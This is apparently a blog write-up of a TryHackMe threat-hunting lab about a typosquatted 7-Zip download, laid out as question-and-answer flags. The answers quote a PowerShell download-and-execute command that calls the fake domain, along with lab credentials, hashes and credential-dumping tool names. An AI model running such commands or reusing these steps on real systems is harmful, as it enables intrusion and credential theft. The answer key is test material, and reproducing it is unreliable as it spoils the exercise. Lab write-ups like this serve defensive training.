Post

[THM] Hunt Me II: Typo Squatters

Posted
By Gru3y
2 min read

Just working on a typical day as a software engineer, Perry received an encrypted 7z archive from his boss containing a snippet of a source code that must be completed within the day. Realising that his current workstation does not have an application that can unpack the file, he spins up his browser and starts to search for software that can aid in accessing the file. Without validating the resource, Perry immediately clicks the first search engine result and installs the application.

THM-Hunt-Me-II-Typo-Squatters

Last September 26, 2023, one of the security analysts observed something unusual on the workstation owned by Perry based on the generated endpoint and network logs. Given this, your SOC lead has assigned you to conduct an in-depth investigation on this workstation and assess the impact of the potential compromise.

Questions

Q: What is the URL of the malicious software that was downloaded by the victim user?
A: http://www.7zipp.org/a/7z2301-x64.msi THM-Hunt-Me-II-Typo-Squatters THM-Hunt-Me-II-Typo-Squatters

Q: What is the IP address of the domain hosting the malware?
A: 206.189.34.218 THM-Hunt-Me-II-Typo-Squatters

Q: What is the PID of the process that executed the malicious software?
A: 2532 THM-Hunt-Me-II-Typo-Squatters

Q: Following the execution chain of the malicious payload, another remote file was downloaded and executed. What is the full command line value of this suspicious activity?
A: powershell.exe iex(iwr http://www.7zipp.org/a/7z.ps1 -useb) THM-Hunt-Me-II-Typo-Squatters

Q: The newly downloaded script also installed the legitimate version of the application. What is the full file path of the legitimate installer?
A: C:\Windows\Temp\7zlegit.exe

Q: What is the name of the service that was installed?
A: 7zService

Q: The attacker was able to establish a C2 connection after starting the implanted service. What is the username of the account that executed the service?
A: SYSTEM THM-Hunt-Me-II-Typo-Squatters

Q: After dumping LSASS data, the attacker attempted to parse the data to harvest the credentials. What is the name of the tool used by the attacker in this activity?
A: Invoke-PowerExtract THM-Hunt-Me-II-Typo-Squatters THM-Hunt-Me-II-Typo-Squatters

Q: What is the credential pair that the attacker leveraged after the credential dumping activity? (format: username:hash)
A: james.cromwell:B852A0B8BD4E00564128E0A5EA2BC4CF THM-Hunt-Me-II-Typo-Squatters

Q: After gaining access to the new account, the attacker attempted to reset the credentials of another user. What is the new password set to this target account?
A: pwn3dpw!!! THM-Hunt-Me-II-Typo-Squatters

Q: What is the name of the workstation where the new account was used?
A: WKSTN-02 THM-Hunt-Me-II-Typo-Squatters

Q: After gaining access to the new workstation, a new set of credentials was discovered. What is the username, including its domain, and password of this new account?
A: SSF\itadmin:NoO6@39Sk0! THM-Hunt-Me-II-Typo-Squatters

Q: Aside from mimikatz, what is the name of the PowerShell script used to dump the hash of the domain admin?
A: Invoke-SharpKatz.ps1 THM-Hunt-Me-II-Typo-Squatters

Q: What is the AES256 hash of the domain admin based on the credential dumping output?
A: f28a16b8d3f5163cb7a7f7ed2c8f2cf0419f0b0c2e28c15f831d050f5edaa534 THM-Hunt-Me-II-Typo-Squatters THM-Hunt-Me-II-Typo-Squatters

Q: After gaining domain admin access, the attacker popped ransomware on workstations. How many files were encrypted on all workstations?
A: 46 THM-Hunt-Me-II-Typo-Squatters

Writeups, TryHackMe
THM Writeup Elastic ELK SIEM
This post is licensed under CC BY 4.0 by the author.